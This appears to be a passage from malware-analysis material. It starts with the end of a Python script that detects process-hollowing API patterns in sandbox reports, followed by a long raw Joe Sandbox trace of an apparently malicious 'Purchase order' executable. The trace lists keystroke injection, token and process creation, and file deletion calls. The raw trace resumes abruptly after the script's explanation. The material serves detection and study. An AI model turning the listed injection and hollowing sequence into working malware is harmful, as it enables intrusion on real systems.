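• Source File: 00000000.00000002.2048696009.0000000003FA0000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA0000, based on PE: false
"""

# One "• Api.MODULE(args), ref: ADDR" line; the arg list and the comma are optional.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
SOURCE_RE = re.compile(
    r"Offset:\s*(?P<base>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)"
)

# Stages of the classic hollowing pattern, keyed to real Win32/NT export names.
STAGES = {
    "spawn":   {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"},
    "context": {"GetThreadContext", "Wow64GetThreadContext",
                "SetThreadContext", "Wow64SetThreadContext"},
    "memory":  {"ReadProcessMemory", "WriteProcessMemory",
                "NtUnmapViewOfSection", "VirtualAllocEx"},
    "resume":  {"ResumeThread", "NtResumeThread"},
}
CONTEXT_FULL_X86 = 0x10007  # CONTEXT_i386 | CONTROL | INTEGER | SEGMENTS


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: int


@dataclass
class Function:
    calls: list = field(default_factory=list)
    base: int = 0
    backed_by_pe: bool = True


def parse_report(text):
    """Split the listing at each 'APIs' header and build one Function per chunk."""
    funcs = []
    for chunk in re.split(r"^[ \t]*APIs[ \t]*$", text, flags=re.M)[1:]:
        fn = Function()
        for line in chunk.splitlines():
            m = CALL_RE.match(line)
            if m:
                args = [a for a in (m["args"] or "").split(",") if a]
                fn.calls.append(Call(m["api"], m["module"], args, int(m["ref"], 16)))
        s = SOURCE_RE.search(chunk)
        if s:
            fn.base = int(s["base"], 16)
            fn.backed_by_pe = s["pe"] == "true"
        funcs.append(fn)
    return funcs


def arg_int(call, index):
    """Argument `index` as an int, or None when the sandbox logged it as '?'."""
    try:
        return int(call.args[index], 16)
    except (IndexError, ValueError):
        return None


def assess(fn):
    """Which hollowing stages a function hits, plus decoded argument hints."""
    apis = {c.api for c in fn.calls}
    stages = {name for name, names in STAGES.items() if apis & names}
    notes = []
    for c in fn.calls:
        if c.api.endswith("GetThreadContext") and arg_int(c, 1) == CONTEXT_FULL_X86:
            notes.append("ContextFlags=CONTEXT_FULL (x86 0x10007)")
        if c.api == "ReadProcessMemory" and arg_int(c, 3) == 4:
            notes.append("ReadProcessMemory of 4 bytes: pointer-sized read from the child")
        if c.api == "Sleep" and arg_int(c, 0) is not None:
            notes.append(f"Sleep({arg_int(c, 0)} ms)")
    return {
        "stages": stages,
        # spawn + thread context + cross-process memory is the core hollowing triad
        "hollowing_like": {"spawn", "context", "memory"} <= stages,
        # code with no PE backing on disk is itself injected or unpacked
        "unbacked_code": not fn.backed_by_pe,
        "notes": notes,
    }


if __name__ == "__main__":
    for fn in parse_report(SAMPLE):
        print(hex(fn.base), [c.api for c in fn.calls], assess(fn))
```

The triad is deliberately strict: a single CreateProcess or a lone ReadProcessMemory is routine, but all three from one function in unbacked memory is the pattern worth a hunting rule, and the `resume` stage is tracked separately because the sandbox may attribute ResumeThread to a different function than the one that set up the child.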
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 63c79d87b9dc87b97f23904b0a68f9c22da550cee3fe5c848e33cb9bf205f94f
                                                            • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                            • Opcode Fuzzy Hash: 63c79d87b9dc87b97f23904b0a68f9c22da550cee3fe5c848e33cb9bf205f94f
                                                            • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                            • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 92a4d35c9551d53168528b11f71eb67eb8de631cac32f1e54116781cc303ea96
                                                            • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                            • Opcode Fuzzy Hash: 92a4d35c9551d53168528b11f71eb67eb8de631cac32f1e54116781cc303ea96
                                                            • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __lock_file
                                                            • String ID:
                                                            • API String ID: 3031932315-0
                                                            • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                            • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                            • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                            • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                            APIs
                                                            • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                            • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                                            • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                            • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: __wfsopen
                                                            • String ID:
                                                            • API String ID: 197181222-0
                                                            • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                            • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                            • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                            • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                            APIs
                                                            • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                            • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                                            • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                            • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                                            APIs
                                                            • Sleep.KERNELBASE(000001F4), ref: 03FA22F9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048696009.0000000003FA0000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3fa0000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction ID: 956bbe1db81e16d94294a84c94d5d809fcb3c8ad03b0b67bbff0d0335150efde
                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                            • Instruction Fuzzy Hash: 3EE0E67494020DEFDB00DFB8D54969D7BB4EF04301F1005A1FD01D2280D6309D508A72
                                                            APIs
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                            • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                            • GetKeyState.USER32(00000011), ref: 0047C92D
                                                            • GetKeyState.USER32(00000009), ref: 0047C936
                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                            • GetKeyState.USER32(00000010), ref: 0047C953
                                                            • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                            • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                            • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                            • _wcsncpy.LIBCMT ref: 0047CA29
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                            • SendMessageW.USER32 ref: 0047CA7F
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                            • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                            • ImageList_SetDragCursorImage.COMCTL32(00A9FE80,00000000,00000000,00000000), ref: 0047CB9B
                                                            • ImageList_BeginDrag.COMCTL32(00A9FE80,00000000,000000F8,000000F0), ref: 0047CBAC
                                                            • SetCapture.USER32(?), ref: 0047CBB6
                                                            • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                            • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                            • ReleaseCapture.USER32 ref: 0047CC3A
                                                            • GetCursorPos.USER32(?), ref: 0047CC72
                                                            • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                            • SendMessageW.USER32 ref: 0047CD12
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                            • SendMessageW.USER32 ref: 0047CD80
                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                            • GetCursorPos.USER32(?), ref: 0047CDC8
                                                            • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                            • GetParent.USER32(00000000), ref: 0047CDF7
                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                            • SendMessageW.USER32 ref: 0047CE93
                                                            • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,00A01A78,00000000,?,?,?,?), ref: 0047CF1C
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                            • SendMessageW.USER32 ref: 0047CF6B
                                                            • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,00A01A78,00000000,?,?,?,?), ref: 0047CFE6
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                            • String ID: @GUI_DRAGID$F
                                                            • API String ID: 3100379633-4164748364
                                                            APIs
                                                            • GetForegroundWindow.USER32 ref: 00434420
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                            • IsIconic.USER32(?), ref: 0043444F
                                                            • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                            • SetForegroundWindow.USER32(?), ref: 0043446A
                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                            • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                            • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                            • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                            • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                            • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                            • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                            • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                            • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                            Strings
                                                            Similarity
                                                            • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 2889586943-2988720461
                                                            APIs
                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                            • CloseHandle.KERNEL32(?), ref: 004463A0
                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                            • GetProcessWindowStation.USER32 ref: 004463D1
                                                            • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                            • _wcslen.LIBCMT ref: 00446498
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • _wcsncpy.LIBCMT ref: 004464C0
                                                            • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                            • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                            • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                            • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                            • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                            • CloseDesktop.USER32(?), ref: 0044657A
                                                            • SetProcessWindowStation.USER32(?), ref: 00446588
                                                            • CloseHandle.KERNEL32(?), ref: 00446592
                                                            • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                            Strings
                                                            Similarity
                                                            • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                            • String ID: $@OH$default$winsta0
                                                            • API String ID: 3324942560-3791954436
                                                            APIs
                                                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Purchase order MIPO2425110032.exe,0040F545,C:\Users\user\Desktop\Purchase order MIPO2425110032.exe,004A90E8,C:\Users\user\Desktop\Purchase order MIPO2425110032.exe,?,0040F545), ref: 0041013C
                                                              • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                              • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                              • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                            • _wcscat.LIBCMT ref: 0044BD94
                                                            • _wcscat.LIBCMT ref: 0044BDBD
                                                            • __wsplitpath.LIBCMT ref: 0044BDEA
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                            • _wcscpy.LIBCMT ref: 0044BE71
                                                            • _wcscat.LIBCMT ref: 0044BE83
                                                            • _wcscat.LIBCMT ref: 0044BE95
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                            • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                            • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                            • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                            • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                            • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                            • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                            • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                            Strings
                                                            Similarity
                                                            • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                            • String ID: \*.*
                                                            • API String ID: 2188072990-1173974218
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                            • FindClose.KERNEL32(00000000), ref: 00478924
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                            • __swprintf.LIBCMT ref: 004789D3
                                                            • __swprintf.LIBCMT ref: 00478A1D
                                                            • __swprintf.LIBCMT ref: 00478A4B
                                                            • __swprintf.LIBCMT ref: 00478A79
                                                              • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                              • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                            • __swprintf.LIBCMT ref: 00478AA7
                                                            • __swprintf.LIBCMT ref: 00478AD5
                                                            • __swprintf.LIBCMT ref: 00478B03
                                                            Strings
                                                            Similarity
                                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                            • API String ID: 999945258-2428617273
                                                            APIs
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                            • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                            • __wsplitpath.LIBCMT ref: 00403492
                                                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                            • _wcscpy.LIBCMT ref: 004034A7
                                                            • _wcscat.LIBCMT ref: 004034BC
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                              • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                              • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                            • _wcscpy.LIBCMT ref: 004035A0
                                                            • _wcslen.LIBCMT ref: 00403623
                                                            • _wcslen.LIBCMT ref: 0040367D
                                                            Strings
                                                            • _, xrefs: 0040371C
                                                            • Unterminated string, xrefs: 00428348
                                                            • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                            • Error opening the file, xrefs: 00428231
                                                            Similarity
                                                            • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                            • API String ID: 3393021363-188983378
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                            • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                            • FindClose.KERNEL32(00000000), ref: 00431B20
                                                            • FindClose.KERNEL32(00000000), ref: 00431B34
                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                            • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                            • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                            • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                            Strings
                                                            Similarity
                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                            • String ID: *.*
                                                            • API String ID: 1409584000-438819550
                                                            • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                            • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                            • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                            • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                            APIs
